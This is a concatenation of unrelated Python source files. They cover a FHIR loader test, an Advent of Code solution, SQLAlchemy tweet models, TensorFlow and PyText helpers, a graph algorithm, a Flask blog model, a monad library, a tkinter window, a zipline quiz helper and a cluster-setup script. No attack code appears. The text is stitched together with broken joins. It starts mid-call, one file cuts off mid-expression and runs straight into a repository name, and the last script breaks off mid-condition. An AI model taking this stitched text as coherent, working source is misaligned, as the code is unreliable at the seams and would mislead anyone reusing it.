"+ansible_variables+" -i inventory.yml", auto_remove=True, volumes_from=socket.gethostname(), working_dir=os.getcwd(), user=os.getuid(), detach=True) for line in container.logs(stream=True): print(line.decode('utf-8').strip()) tests/__init__.py0 import os from fhir_loader import fhir_loader cwd = os.path.abspath(os.path.dirname(__file__)) datadir = os.path.join(cwd, 'data') # ***** server must be pointed at a working FHIR server for test_loader tests to work # server = "http://localhost:88/baseR4/" server = "http://192.168.3.11:88/baseR4" # server=None # Preload the groups so the rest of the tests work fhir_loader([server, os.path.join(datadir, 'preload'), '-v', '-r'])import itertools def ReadDocuments(filename): with open(filename,"r") as file: data = [int(line.strip("\n")) for line in file.readlines()] return data def FindInvalid(data,preamble_length): i = preamble_length while i < len(data): a = [x for x in range(i-preamble_length,i)] is_sum = False for j, k in itertools.combinations_with_replacement(a,2): if j != k and (data[j]+data[k] == data[i]): #print(f"i={i}={data[i]} j={j}={data[j]} k={k}={data[k]} sum j+k ={data[j]+data[k]}" ) if data[j]+data[k] == data[i]: is_sum = True if is_sum: break if is_sum: break if not is_sum: return i, data[i] else: i += 1 def FindContigValsSum(data, invalid): n = len(data) for i in range(n): summation = data[i] for j in range(i+1,n): summation += data[j] if summation == invalid: return data[i:j] elif summation > invalid: break if __name__=="__main__": # example.txt has a length 5 preamble and considers the 5 previous numbers # input.txt has a length 25 preamble and considers the 25 previous numbers data = ReadDocuments("input.txt") line, value = FindInvalid(data,25) print(f"First invalid value = {value} at line {line}") contigvals = FindContigValsSum(data,value) print(f"Encryption Weakness = {max(contigvals)+min(contigvals)}") """ This contains classes for loading tweet data In the process of being converted to use sqlalchemy """ from sqlalchemy import Table, Column, ForeignKey, Integer, String, JSON, DateTime from sqlalchemy.ext.declarative import declarative_base from sqlalchemy import inspect import datetime from sqlalchemy.sql import func # import DatabaseAccessObjects.EngineMakers # from DatabaseAccessObjects import DataConnections import json # connecting to db # Base class that maintains the catalog of tables and classes in db Base = declarative_base() class Users(Base): __tablename__ = 'users' # indexer = Column(Integer, unique=True) userID = Column(Integer, primary_key=True, autoincrement=False) screen_name = Column(String(225)) id_str = Column(String(225)) name = Column(String(225)) description = Column(String(250)) lang = Column(String(100)) utc_offset = Column(String(100)) verified = Column(String(100)) followers_count = Column(Integer) friends_count = Column(Integer) url = Column(String(100)) time_zone = Column(String(100)) created_at = Column(String(100)) entities = Column(String(225)) favourites_count = Column(Integer) statuses_count = Column(Integer) id = Column(String(225)) location = Column(String(225)) is_translation_enabled = Column(String(10)) other_data = Column(JSON()) record_created = Column(DateTime, server_default=func.now()) record_updated = Column(DateTime, onupdate=datetime.datetime.now) audit_data = Column(JSON()) def item_type( self ): return 'user' def to_dict( self ): mapper = inspect(Users) return { column.key : getattr(self, column.key) for column in mapper.attrs} # def add_tweet_update_info_to_audit_data( self, toAdd ): # d = self.audit_data # for k in d.keys(): # print(k) # # if 'updated_from_tweet' not in d.keys(): # print('adding') # d['updated_from_tweet'] = [] # # d['updated_from_tweet'].append(toAdd) # self.audit_data = d class User(Users): """Better named alias""" def __init__(self, **kwargs): super().__init__(**kwargs) class Hashtags(Base): __tablename__ = 'hashtags' # Here we define columns for the table hashtags # Notice that each column is also a normal Python instance attribute. tagID = Column(Integer, primary_key=True) hashtag = Column(String(100), nullable=False) # record_created = Column(DateTime, server_default=func.now()) # record_updated = Column(DateTime, onupdate=func.now()) class Tweets(Base): __tablename__ = 'tweets' # Here we define columns for the table address. # Notice that each column is also a normal Python instance attribute. tweetID = Column(Integer, primary_key=True, autoincrement=False) userID = Column(Integer) #, ForeignKey('users.userID')) tweetText = Column(String(250)) favorite_count = Column(Integer) source = Column(String(250), nullable=False) retweeted = Column(String(10)) retweet_count = Column(Integer) in_reply_to_screen_name = Column(String(100)) favorited = Column(String(10)) lang = Column(String(100)) created_at = Column(String(100)) profile_background_tile = Column(String(100)) is_translation_enabled = Column(String(100)) profile_location = Column(String(100)) other_data = Column(JSON()) record_created = Column(DateTime, server_default=func.now()) record_updated = Column(DateTime, onupdate=datetime.datetime.now) audit_data = Column(JSON()) def item_type( self ): return 'tweet' class Tweet(Tweets): """Better named alias""" def __init__(self, **kwargs): super().__init__( **kwargs) tweetsXtags = Table('tweetsXtags', Base.metadata, Column('tweetID', Integer), # ForeignKey('tweets.tweetID')), Column('tagID', Integer), # ForeignKey('hashtags.tagID')) ) ##################### Non definitional stuff def _make_defined_data(data, defined_keys): """Takes the incoming tweet data and pulls out all of the items which go into fields of the db and puts the rest into a json string under other_data """ # This will be the data that goes directly into the model defined_data = {} # This will be the data that goes into the other_data field forJson = { } for k in data.keys(): datum = data[k] # check whether it is a dict and encode, if necessary if type(datum) == dict: datum = json.dumps(datum) if k in defined_keys: defined_data[k] = datum else: forJson[k] = datum # Set the data that didn't have a field # to the json field defined_data['other_data'] = json.dumps(forJson) return defined_data def TweetFactory( data: dict ): """This consumes a dictionary of data and returns a Tweet object. If the dictionary contains keys which do not correspond to a field in User, such fields are added to the json column `other_data` This is necessary because Twitter sometimes updates the keys in the results that we receive and sqlalchemy will be sad if pass in data which lacks defined fields. NB, this simply creates and populates the Tweet object. It does not add or commit it to the database :type data: dict """ # The first step is to sort the incoming data mapper = inspect(Tweets) # create the list of valid keys defined_keys = [column.key for column in mapper.attrs] defined_data = _make_defined_data(data, defined_keys) # Now set any fields which do not have couterparts in the # the incoming data defined_data['tweetID'] = int(data['id_str']) defined_data['userID'] = int(data['user']['id_str']) defined_data['tweetText'] = data['text'].encode('unicode_escape') # create a new instance with the data return Tweet(**defined_data) def UserFactory( data: dict ): """This consumes a dictionary of data and returns a User object. If the dictionary contains keys which do not correspond to a field in User, such fields are added to the json column `other_data` This is necessary because Twitter sometimes updates the keys in the results that we receive and sqlalchemy will be sad if pass in data which lacks defined fields. NB, this simply creates and populates the User object. It does not add or commit it to the database :rtype: object :type data: dict """ # The first step is to sort the incoming data mapper = inspect(Users) # These will be the fields to save to corresponding columns # in the database defined_keys = [column.key for column in mapper.attrs] defined_data = _make_defined_data(data, defined_keys) # Now set any fields which do not have couterparts in the # the incoming data defined_data['userID'] = int(defined_data['id']) # create a user instance with the data return User(**defined_data) # # # This will be the data that goes directly into the model # defined_data = {} # # This will be the data that goes into the other_data field # forJson = { } # # for k in data.keys(): # datum = data[k] # # check whether it is a dict and encode, if necessary # if type(datum) == dict: # datum = json.dumps(datum) # # if k in defined_keys: # defined_data[k] = datum # # else: # forJson[k] = datum def create_db_tables(engine, seed=False): """Creates tables in the database Create all tables in the engine. This is equivalent to "Create Table" statements in raw SQL. # """ # engine = DatabaseAccessObjects.EngineMakers.initialize_engine() # create the tables Base.metadata.create_all(engine) # metadata = MetaData( ) abhinavarora/pytext0 #!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved import glob import json import os import unittest from pytext.builtin_task import register_builtin_tasks from pytext.config import PyTextConfig, config_from_json from pytext.config.config_adapter import upgrade_one_version, upgrade_to_latest register_builtin_tasks() class ConfigAdapterTest(unittest.TestCase): def test_upgrade_one_version(self): for p in glob.iglob( os.path.join(os.path.dirname(__file__), "json_config/*.json") ): print("Trying to upgrade file:" + p) with open(p) as f: test_data = json.load(f) for test_case in test_data: old_config = test_case["original"] new_config = upgrade_one_version(old_config) self.assertEqual(new_config, test_case["adapted"]) # ensure every historical config can be upgrade to latest def test_upgrade_to_latest(self): for p in glob.iglob( os.path.join(os.path.dirname(__file__), "json_config/*.json") ): print("Trying to upgrade file:" + p) with open(p) as f: test_data = json.load(f) for test_case in test_data: json_config = upgrade_to_latest(test_case["original"]) config_from_json(PyTextConfig, json_config) # Copyright 2015 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Trains and Evaluates the MNIST network using a feed dictionary.""" # pylint: disable=missing-docstring import os import time import numpy from six.moves import xrange # pylint: disable=redefined-builtin import tensorflow as tf import math import numpy as np def placeholder_inputs(batch_size=16, num_frame_per_clib=16, crop_size=224, rgb_channels=3, flow_channels=2): """Generate placeholder variables to represent the input tensors. These placeholders are used as inputs by the rest of the model building code and will be fed from the downloaded data in the .run() loop, below. Args: batch_size: The batch size will be baked into both placeholders. num_frame_per_clib: The num of frame per clib. crop_size: The crop size of per clib. channels: The input channel of per clib. Returns: images_placeholder: Images placeholder. labels_placeholder: Labels placeholder. """ # Note that the shapes of the placeholders match the shapes of the full # image and label tensors, except the first dimension is now batch_size # rather than the full size of the train or test data sets. rgb_images_placeholder = tf.placeholder(tf.float32, shape=(batch_size, num_frame_per_clib, crop_size, crop_size, rgb_channels)) flow_images_placeholder = tf.placeholder(tf.float32, shape=(batch_size, num_frame_per_clib, crop_size, crop_size, flow_channels)) labels_placeholder = tf.placeholder(tf.int64, shape=(batch_size )) is_training = tf.placeholder(tf.bool) return rgb_images_placeholder, flow_images_placeholder, labels_placeholder, is_training def average_gradients(tower_grads): average_grads = [] for grad_and_vars in zip(*tower_grads): grads = [] for g, _ in grad_and_vars: expanded_g = tf.expand_dims(g, 0) grads.append(expanded_g) grad = tf.concat(grads, 0) grad = tf.reduce_mean(grad, 0) v = grad_and_vars[0][1] grad_and_var = (grad, v) average_grads.append(grad_and_var) return average_grads def tower_loss( logit, labels): print(labels) print(logit) print(logit.shape) cross_entropy_mean = tf.reduce_mean( tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels, logits=logit) ) # Calculate the total loss for the current tower. total_loss = cross_entropy_mean return total_loss def tower_acc(logit, labels): correct_pred = tf.equal(tf.argmax(logit, 1), labels) accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32)) return accuracy def _variable_on_cpu(name, shape, initializer): with tf.device('/cpu:0'): var = tf.get_variable(name, shape, initializer=initializer) return var def _variable_with_weight_decay(name, shape, wd): var = _variable_on_cpu(name, shape, tf.contrib.layers.xavier_initializer()) if wd is not None: weight_decay = tf.nn.l2_loss(var)*wd tf.add_to_collection('weightdecay_losses', weight_decay) return var from multiprocessing import Pool from contextlib import closing import pandas as pd import numpy as np import argparse import glob import time try: import __builtin__ except ImportError: # Python 3 import builtins as __builtin__ # For debugging purposes only: def print(*args, **kwargs): __builtin__.print('\t molecular_file_count_updated: ', end="") return __builtin__.print(*args, **kwargs) parser = argparse.ArgumentParser() parser.add_argument('-pt','--project_name',required=True,help='Name of the DD project') parser.add_argument('-it','--n_iteration',required=True,help='Number of current DD iteration') parser.add_argument('-cdd','--data_directory',required=True,help='Path to directory contaning the remaining molecules of the database ') parser.add_argument('-t_pos','--tot_process',required=True,help='Number of CPUs to use for multiprocessing') parser.add_argument('-t_samp','--tot_sampling',required=True,help='Total number of molecules to sample in the current iteration; for first iteration, consider training, validation and test sets, for others only training') io_args = parser.parse_args() protein = io_args.project_name n_it = int(io_args.n_iteration) data_directory = io_args.data_directory tot_process = int(io_args.tot_process) tot_sampling = int(io_args.tot_sampling) print("Parsed Args:") print(" - Iteration:", n_it) print(" - Data Directory:", data_directory) print(" - Training Size:", tot_process) print(" - Validation Size:", tot_sampling) def write_mol_count_list(file_name,mol_count_list): with open(file_name,'w') as ref: for ct,file_name in mol_count_list: ref.write(str(ct)+","+file_name.split('/')[-1]) ref.write("\n") def molecule_count(file_name): temp = 0 with open(file_name,'r') as ref: ref.readline() for line in ref: temp+=1 return temp, file_name if __name__=='__main__': files = [] for f in glob.glob(data_directory+'/*.txt'): files.append(f) print("Number Of Files:", len(files)) t=time.time() print("Reading Files...") with closing(Pool(np.min([tot_process,len(files)]))) as pool: rt = pool.map(molecule_count,files) print("Done Reading Finals - Time Taken", time.time()-t) print("Saving File Count...") write_mol_count_list(data_directory+'/Mol_ct_file.csv',rt) mol_ct = pd.read_csv(data_directory+'/Mol_ct_file.csv',header=None) mol_ct.columns = ['Number_of_Molecules','file_name'] Total_sampling = tot_sampling Total_mols_available = np.sum(mol_ct.Number_of_Molecules) mol_ct['Sample_for_million'] = [int(Total_sampling/Total_mols_available*elem) for elem in mol_ct.Number_of_Molecules] mol_ct.to_csv(data_directory+'/Mol_ct_file_updated.csv',sep=',',index=False) print("Done - Time Taken", time.time()-t) BarrensZeppelin/PyRival1-10 def scc(graph): """ Finds what strongly connected components each node is a part of in a directed graph, it also finds a weak topological ordering of the nodes """ n = len(graph) comp = [-1] * n top_order = [] Q = [] stack = [] new_node = None for root in range(n): if comp[root] >= 0: continue # Do a dfs while keeping track of depth Q.append(root) root_depth = len(top_order) while Q: node = Q.pop() if node >= 0: if comp[node] >= 0: continue # First time # Index the node comp[node] = len(top_order) + len(stack) stack.append(node) # Do a dfs Q.append(~node) Q += graph[node] else: # Second time node = ~node # calc low link low = index = comp[node] for nei in graph[node]: if root_depth <= comp[nei]: low = min(low, comp[nei]) # low link same as index, so create SCC if low == index: while new_node != node: new_node = stack.pop() comp[new_node] = index top_order.append(new_node) else: comp[node] = low top_order.reverse() return comp, top_order # -*- coding: utf-8 -*- # @Time : 2019-12-21 # @Author : mizxc # @Email : import os import random from mongoengine import * from flask_login import UserMixin, AnonymousUserMixin from project.model.blog import * from project.model.photoAlbum import * from project.config import BaseConfig USER_CUSTOM = { 'webName': 'kispower', 'webIntro': u'好用的知识管理工具', 'webKeywords':u'kispower 知识管理 学习工具', 'favicon': 'local/images/favicon.png', 'logo': 'local/images/logo.png', 'copyright':u'Copyright © 2020 Kispower All rights reserved 粤ICP备xxxxxx号', 'statisticalCode':'', 'commentCode':'', 'homeTemplate': 'theme/lifeleck', 'slide':[ ['local/images/slide1.jpg','kispower','个人知识管理系统','http://www.kispower.com'], ['local/images/slide2.jpg','kispower','最好用的知识管理系统','http://www.kispower.com'], ['local/images/slide3.jpg','kispower','知识管理+时间管理','http://www.kispower.com'], ['local/images/slide4.jpg','kispower','个人知识分享网站','http://www.kispower.com'], ['local/images/slide5.jpg','kispower','个人网络工作室','http://www.kispower.com'] ], 'tags':{}, 'weixin':'local/images/weixin.jpg', 'weibo':'https://weibo.com/p/1005056368574508', 'dailyTasks':[ ['L1',u'请点击:日常任务管理,添加常用任务'], ['L2',u'如果不需要可以删除全部日常任务'] ] } class CommonUserMethod: def getRandomImage(self): randomImagePath = os.path.join(BaseConfig.BASE_DIR, BaseConfig.RANDOM_IMAGE_PATH) images = os.listdir(randomImagePath) return '/%s/%s' % (BaseConfig.RANDOM_IMAGE_PATH,random.choice(images)) def getBlogColumn(self): return Column.objects.order_by('+number') def getRecentPost(self): return Post.objects.order_by('-id')[:5] def getHotPost(self): return Post.objects.order_by('-pv')[:5] def getPrevAndNextPost(self,id): ps = Post.objects prev = None next = None for index, p in enumerate(ps): if p.id == id: if index!=0:prev = ps[index-1] if index+1constrainedlearning/advbench import torch from numpy import pi from einops import rearrange, reduce, repeat from kornia.geometry import warp_affine from kornia.geometry.transform import Affine import numpy as np import functools import math def deg2rad(angle): return angle*pi/180.0 def _compute_tensor_center(tensor: torch.Tensor) -> torch.Tensor: """Compute the center of tensor plane for (H, W), (C, H, W) and (B, C, H, W).""" if not 2 <= len(tensor.shape) <= 4: raise AssertionError(f"Must be a 3D tensor as HW, CHW and BCHW. Got {tensor.shape}.") height, width = tensor.shape[-2:] center_x: float = float(width - 1) / 2 center_y: float = float(height - 1) / 2 center: torch.Tensor = torch.tensor([center_x, center_y], device=tensor.device, dtype=tensor.dtype) return center def angle_to_rotation_matrix(angle, imgs): """Create a rotation matrix out of angles in degrees. Args: angle: tensor of angles in degrees, shape Bx1. Returns: tensor of rotation matrices with shape (B, 2, 3). """ B = angle.shape[0] ang_rad = deg2rad(angle) cos_a = torch.cos(ang_rad) sin_a = torch.sin(ang_rad) center = _compute_tensor_center(imgs) rotat_m = repeat(torch.eye(3), 'd1 d2 -> b d1 d2',b=B).clone() a_mat = torch.stack([cos_a, sin_a, -sin_a, cos_a], dim=-1) rotat_m[:, :2, :2] = rearrange(a_mat, 'b (d1 d2) -> b d1 d2', d1=2, d2=2).clone() center = repeat(_compute_tensor_center(imgs), 'd -> b d',b=B).clone() shift_m = txs_to_translation_matrix(center) shift_m_inv = txs_to_translation_matrix(-center) return shift_m @ rotat_m @ shift_m_inv def se_matrix(delta, imgs): """ delta: Bx3 (third dimension is rotation , w translation, h traslation) returns se: Bx2x3 """ angle, txs = delta[:, 0], delta[:,1:] affine = torch.zeros((angle.shape[0],2,3)) rotat_m = angle_to_rotation_matrix(angle, imgs) trans_m = txs_to_translation_matrix(txs) return (rotat_m@trans_m)[:,:2,:] def txs_to_translation_matrix(txs): """Create a translation matrix out of translations in pixels. Args: txs: tensor of translations in pixels, shape Bx2 Returns: tensor of translation matrices with shape (B, 3, 3). """ shift_m = repeat(torch.eye(3), 'd1 d2 -> b d1 d2', b=txs.shape[0]).clone() shift_m[:, :2, 2] = txs return shift_m def se_transform(imgs, delta): return warp_affine(imgs, se_matrix(delta, imgs).to(imgs.device).to(imgs.dtype), imgs.shape[2:]) def translation(imgs, delta): """ delta: Bx3 ( flip, w translation, h traslation) returns se: Bx2x3 """ return Affine(translation = delta.to(imgs.device).to(imgs.dtype))(imgs) class Cutout: """Randomly mask out a patch from an image. Args: size (int): The size of the square patch. """ def __init__(self, size): self.size = size def __call__(self, img): """ Args: img (Tensor): Tensor image Returns: Tensor: Image with a hole of dimension size x size cut out of it. """ h = img.size(1) w = img.size(2) mask = np.ones((h, w), np.float32) y = np.random.randint(h) x = np.random.randint(w) y1 = np.clip(y - self.size // 2, 0, h) y2 = np.clip(y + self.size // 2, 0, h) x1 = np.clip(x - self.size // 2, 0, w) x2 = np.clip(x + self.size // 2, 0, w) mask[y1: y2, x1: x2] = 0. mask = torch.from_numpy(mask) mask = mask.expand_as(img) img = img * mask return img ################### ##### Pointcloud ################## def translate_pointcloud(pointcloud): xyz1 = np.random.uniform(low=2./3., high=3./2., size=[3]) xyz2 = np.random.uniform(low=-0.2, high=0.2, size=[3]) translated_pointcloud = np.add(np.multiply(pointcloud, xyz1), xyz2).astype('float32') return translated_pointcloud def jitter_pointcloud(pointcloud, sigma=0.01, clip=0.02): N, C = pointcloud.shape pointcloud += np.clip(sigma * np.random.randn(N, C), -1*clip, clip) return pointcloud from functools import wraps __all__ = ( 'Just', 'Nothing', 'Left', 'Right', 'Success', 'Failture', 'IO', 'maybe', 'maybe_wraps', 'either', 'either_wraps', 'error', 'error_wraps', 'io', 'io_wraps', ) class Monad(object): __slots__ = ('_val', ) def __init__(self, val): self._val = val def __rshift__(self, form): if isinstance(form, (list, tuple)): func, args = form[0], form[1:] else: func = form args = () return func(self._val, *args) def bind(self, *form): return self >> form def __eq__(self, other): """ Compares two monadic values by their type and content. """ return ( type(self) == type(other) and self._val == other._val ) def __repr__(self): return "%s[%s]" % (self.__class__.__name__, self._val) def get(self): return self._val class Nothing(Monad): """ Represents a negative Maybe value. """ def __init__(self): pass def __rshift__(self, func): """ Always returns current object without performing a passed function. """ return self def __eq__(self, other): return isinstance(other, Nothing) def __repr__(self): return self.__class__.__name__ def get(self): return None class Just(Monad): """ Represents a positive Maybe value. """ pass class Left(Monad): """ Represents a negative Either value. """ def __rshift__(self, func): return self class Right(Monad): """ Represents a positive Either value. """ pass class Success(Monad): """ Represents a positive Error value. """ def recover(self, exc_class, val_or_func): """ Does nothing, returning the current monadic value. """ return self class Failture(Monad): """ Represents a negative Error value. """ def __rshift__(self, func): return self def get(self): raise self._val def recover(self, exc_class, val_or_func): """ Recovers an exception. :param exc_class: An exception class or a tuple of classes to recover. :type exc_class: Exception|tuple of Exception :param val_or_func: A value or a function to get a positive result. :type val_or_func: any|function :return: Success instance if the cought exception matches `exc_class` or Failture if it does not. :rtype: Failture|Success Usage: error(lambda: 1 / 0).recover(Exception, 42).get() >>> 42 """ e = self._val def is_callable(val): return hasattr(val_or_func, '__call__') def resolve(): if is_callable(val_or_func): return val_or_func(e) else: return val_or_func if isinstance(e, exc_class): return Success(resolve()) else: return self class IO(Monad): """ Represents IO value. """ pass def maybe(pred): """ Maybe constructor. Takes a predicate and returns a function that receives `x` and returns a Maybe instance of `x`. :param pred: a function that determines if a value is Just or Nothing. :type pred: function :return: Maybe unit function. :rtype: function """ def maybe_unit(x): """ Maybe unit. :param x: Any non-monadic value. :type x: any :return: Monadic value. :rtype: Just|Nothing """ if pred(x): return Just(x) else: return Nothing() return maybe_unit def maybe_wraps(pred): """ Decorator that wraps a function with maybe behaviour. """ def decorator(func): @wraps(func) def wrapper(*args, **kwargs): return maybe(pred)(func(*args, **kwargs)) return wrapper return decorator def either(pred_l, pred_r): """ Either constructor. Takes two predicates and returns a function that receives `x` and returns an Either instance of `x`. :param pred_l: Left predicate. :type pred_l: function :param pred_r: Right predicate. :type pred_r: function :return: Either unit function. :rtype: function """ def either_unit(x): """ Either unit. :param x: Any non-monadic value. :type x: any :return: Monadic value. :rtype: Left|Right """ if pred_l(x): return Left(x) if pred_r(x): return Right(x) msg = "Value %s doesn't fit %s nor %s predicates." params = (x, pred_l, pred_r) raise TypeError(msg % params) return either_unit def either_wraps(pred_l, pred_r): """ Decorator that wraps a function with either behaviour. """ def decorator(func): @wraps(func) def wrapper(*args, **kwargs): return either(pred_l, pred_r)(func(*args, **kwargs)) return wrapper return decorator def error(func): """ Error constructor. Takes a function with additional arguments. Calls the function handling any possible exceptions. Returns either `Success` with actual value or `Failture` with an exception instance inside. :param func: A function to call. :type func: function :param args: A tuple of positional parameters :type args: tuple of any :param kwargs: A dict of named parameters. :type kwargs: dict of any :return: Monadic value of Error :rtype: Success|Failture """ def error_unit(*args, **kwargs): try: return Success(func(*args, **kwargs)) except Exception as e: return Failture(e) return error_unit error_wraps = error def io(func): """ Decorator that wraps a function with IO behaviour. """ @wraps(func) def wrapper(*args, **kwargs): return IO(func(*args, **kwargs)) return wrapper io_wraps = io 0 import tkinter as tk # import tkinter in Python 3. If using Python 2 change to: import Tkinter from tkinter import ttk # Themed tkinter (Improves GUI look and feel) class Window(tk.Tk): # Class window inherits from tk.Tk() def __init__(self, title="Window", Height=500, Width=500, resizable=True, centered=True): # Constructor super().__init__() self.title(title) self.height, self.width = Height, Width self.geometry(str(Height)+"x"+str(Width)) if(not resizable): self.resizable(0,0) if(centered): self.centerWindow() self.bind("", self.exit) def centerWindow(self): # Makes the window appears on the screen center screenWidth, screenHeight = self.winfo_screenwidth(), self.winfo_screenheight() x, y = int(screenWidth/2 - self.width/2), int(screenHeight/2 - self.height/2) self.geometry("+{}+{}".format(x, y)) def exit(self, event): self.destroy() def run(self): self.mainloop()jcrangel/AI-for-TradingQuiz/m4_multifactor_models/m4l3/quiz_helper.py import numpy as np import pandas as pd import time import alphalens as al from zipline.assets._assets import Equity # Required for USEquityPricing from zipline.pipeline.data import USEquityPricing from zipline.pipeline.classifiers import Classifier from zipline.pipeline.engine import SimplePipelineEngine from zipline.pipeline.loaders import USEquityPricingLoader from zipline.utils.numpy_utils import int64_dtype # EOD_BUNDLE_NAME = 'm4-quiz-eod-quotemedia' EOD_BUNDLE_NAME = 'eod-quotemedia' class PricingLoader(object): def __init__(self, bundle_data): self.loader = USEquityPricingLoader( bundle_data.equity_daily_bar_reader, bundle_data.adjustment_reader) def get_loader(self, column): if column not in USEquityPricing.columns: raise Exception('Column not in USEquityPricing') return self.loader class Sector(Classifier): dtype = int64_dtype window_length = 0 inputs = () missing_value = -1 def __init__(self): self.data = np.load('../../data/project_4_sector/data.npy') def _compute(self, arrays, dates, assets, mask): return np.where( mask, self.data[assets], self.missing_value, ) def build_pipeline_engine(bundle_data, trading_calendar): pricing_loader = PricingLoader(bundle_data) engine = SimplePipelineEngine( get_loader=pricing_loader.get_loader, calendar=trading_calendar.all_sessions, asset_finder=bundle_data.asset_finder) return engine def get_factor_exposures(factor_betas, weights): return factor_betas.loc[weights.index].T.dot(weights) def get_pricing(data_portal, trading_calendar, assets, start_date, end_date, field='close'): end_dt = pd.Timestamp(end_date.strftime('%Y-%m-%d'), tz='UTC', offset='C') start_dt = pd.Timestamp(start_date.strftime('%Y-%m-%d'), tz='UTC', offset='C') end_loc = trading_calendar.closes.index.get_loc(end_dt) start_loc = trading_calendar.closes.index.get_loc(start_dt) return data_portal.get_history_window( assets=assets, end_dt=end_dt, bar_count=end_loc - start_loc, frequency='1d', field=field, data_frequency='daily') def make_factor_plot(df, data_portal, trading_calendar, start_date, end_date): assets = df.index.levels[1].values.tolist() df = df.dropna() pricing = get_pricing( data_portal, trading_calendar, assets, start_date, end_date, 'close' ) factor_names = df.columns factor_data = {} start_time = time.clock() for factor in factor_names: print("Formatting factor data for: " + factor) factor_data[factor] = al.utils.get_clean_factor_and_forward_returns( factor=df[factor], prices=pricing, periods=[1] ) end_time = time.clock() print("Time to get arrange factor data: %.2f secs" % (end_time - start_time)) ls_factor_returns = [] start_time = time.clock() for i, factor in enumerate(factor_names): ls = al.performance.factor_returns(factor_data[factor]) ls.columns = [factor] ls_factor_returns.append(ls) end_time = time.clock() print("Time to generate long/short returns: %.2f secs" % (end_time - start_time)) df_ls_factor_returns = pd.concat(ls_factor_returns, axis=1) (1+df_ls_factor_returns).cumprod().plot(title='Factor Returns'); return df_ls_factor_returns#!/usr/bin/env python3.6 # Copyright 2018 U.C. Berkeley RISE Lab # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import boto3 import os import sys from add_nodes import add_nodes import util ec2_client = boto3.client('ec2', os.getenv('AWS_REGION', 'us-east-1')) def create_cluster(mem_count, ebs_count, func_count, sched_count, route_count, bench_count, cfile, ssh_key, cluster_name, kops_bucket, aws_key_id, aws_key): # create the cluster object with kops util.run_process(['./create_cluster_object.sh', cluster_name, kops_bucket, ssh_key]) client, apps_client = util.init_k8s() # create the kops pod print('Creating management pods...') kops_spec = util.load_yaml('yaml/pods/kops-pod.yml') env = kops_spec['spec']['containers'][0]['env'] util.replace_yaml_val(env, 'AWS_ACCESS_KEY_ID', aws_key_id) util.replace_yaml_val(env, 'AWS_SECRET_ACCESS_KEY', aws_key) util.replace_yaml_val(env, 'KOPS_STATE_STORE', kops_bucket) util.replace_yaml_val(env, 'FLUENT_CLUSTER_NAME', cluster_name) client.create_namespaced_pod(namespace=util.NAMESPACE, body=kops_spec) # wait for the kops pod to start kops_ip = util.get_pod_ips(client, 'role=kops', is_running=True)[0] # copy kube config file to kops pod, so it can execute kubectl commands kops_podname = kops_spec['metadata']['name'] kcname = kops_spec['spec']['containers'][0]['name'] os.system('cp %s kvs-config.yml' % cfile) util.copy_file_to_pod(client, '/home/ubuntu/.kube/config', kops_podname, '/root/.kube/', kcname) util.copy_file_to_pod(client, ssh_key, kops_podname, '/root/.ssh/', kcname) util.copy_file_to_pod(client, ssh_key + '.pub', kops_podname, '/root/.ssh/', kcname) util.copy_file_to_pod(client, 'kvs-config.yml', kops_podname, '/fluent/conf/', kcname) # start the monitoring pod mon_spec = util.load_yaml('yaml/pods/monitoring-pod.yml') util.replace_yaml_val(mon_spec['spec']['containers'][0]['env'], 'MGMT_IP', kops_ip) client.create_namespaced_pod(namespace=util.NAMESPACE, body=mon_spec) util.get_pod_ips(client, 'role=monitoring') # copy config file into monitoring pod -- wait till we create routing pods, # so we're sure that the monitoring nodes are up and running util.copy_file_to_pod(client, 'kvs-config.yml', mon_spec['metadata']['name'], '/fluent/conf/', mon_spec['spec']['containers'][0]['name']) os.system('rm kvs-config.yml') print('Creating %d routing nodes...' % (route_count)) add_nodes(client, apps_client, cfile, ['routing'], [route_count], True) util.get_pod_ips(client, 'role=routing') print('Creating %d memory, %d ebs node(s)...' % (mem_count, ebs_count)) add_nodes(client, apps_client, cfile, ['memory', 'ebs'], [mem_count, ebs_count], True) print('Creating routing service...') service_spec = util.load_yaml('yaml/services/routing.yml') client.create_namespaced_service(namespace=util.NAMESPACE, body=service_spec) print('Adding %d scheduler nodes...' % (sched_count)) add_nodes(client, apps_client, cfile, ['scheduler'], [sched_count], True) util.get_pod_ips(client, 'role=scheduler') print('Adding %d function serving nodes...' % (func_count)) add_nodes(client, apps_client, cfile, ['function'], [func_count], True) print('Creating function service...') service_spec = util.load_yaml('yaml/services/function.yml') client.create_namespaced_service(namespace=util.NAMESPACE, body=service_spec) print('Adding %d benchmark nodes...' % (bench_count)) add_nodes(client, apps_client, cfile, ['benchmark'], [bench_count], True) print('Finished creating all pods...') os.system('touch setup_complete') util.copy_file_to_pod(client, 'setup_complete', kops_podname, '/fluent', kcname) os.system('rm setup_complete') sg_name = 'nodes.' + cluster_name sg = ec2_client.describe_security_groups( Filters=[{'Name': 'group-name', 'Values': [sg_name]}])['SecurityGroups'][0] print('Authorizing ports for routing service...') permission = [{ 'FromPort': 6200, 'IpProtocol': 'tcp', 'ToPort': 6203, 'IpRanges': [{ 'CidrIp': '0.0.0.0/0' }] }] ec2_client.authorize_security_group_ingress(GroupId=sg['GroupId'], IpPermissions=permission) routing_svc_addr = util.get_service_address(client, 'routing-service') function_svc_addr = util.get_service_address(client, 'function-service') print('The routing service can be accessed here: \n\t%s' % (routing_svc_addr)) print('The function service can be accessed here: \n\t%s' % (function_svc_addr)) def parse_args(args, length, typ): result = [] for arg in args[:length]: try: result.append(typ(arg)) except ValueError: print('Unrecognized command-line argument %s. Could not convert \ to integer.' % (arg)) sys.exit(1) return tuple(result) if __name__ == '__main__': if len(sys.argv) 